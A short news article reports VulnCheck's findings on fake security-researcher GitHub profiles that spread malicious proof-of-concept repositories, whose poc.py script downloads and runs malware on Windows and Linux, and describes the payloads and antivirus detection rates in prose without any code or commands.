Hackers are now impersonating security researchers on Github to spread fake zero-day proof of concept (PoC) exploits that infect Windows and Linux machines. The fake profiles come from a company named “High Sierra Cyber Security” promoting their fake PoC repositories in Github.
The discoverers of the campaign, VulnCheck reports that it has been active since at least May 2023. The exploits include PoCs for zero-day vulnerabilities in popular consumer software like Chrome, Discord, Signal, Microsoft Exchange and Whatsapp.
The profiles appear legitimate, complete with pictures of other real security researchers from firms like Rapid7. The profiles are also linked to social media accounts such as Twitter, presumably adding another layer of legitimacy to these otherwise bogus Github profiles.
Regardless, every profile contains malicious repositories with a Python script named poc.py which downloads the malware installed on the target system. The script starts off by downloading a zip archive from an external URL based on the user’s operating system — cveswindows.zip for Windows and cveslinux.zip for Linux.
Once the zip file is downloaded, the malware is tucked away in the OS’ temporary storage before extraction and execution. These directories include %temp% in Windows and /home/[username]/.local/share in Linux.
We don’t yet know what kind of malware the malicious zip files are installing, but VulnCheck reports that both executables install a Tor client with the Windows version also, including a password-stealing trojan. Luckily, the Windows malware is quickly detected as over 60% of antivirus engines on Virustotal can identify suspicious behaviour. Conversely, the Linux version is harder to detect, with only three antivirus engines picking up signs of malicious activity.
The threat actors behind the campaign are also unknown, but they seem persistent, creating new profiles and repositories every time existing ones get flagged and deleted. We also don’t know the real-world impact of the campaign just yet.
Overall, at the time of writing, the threat actors have the following seven malicious repositories on Github that you shouldn’t touch with a ten-foot pole.
In addition to that, several Twitter accounts have also been created to lend more legitimacy to the fake profiles. These include: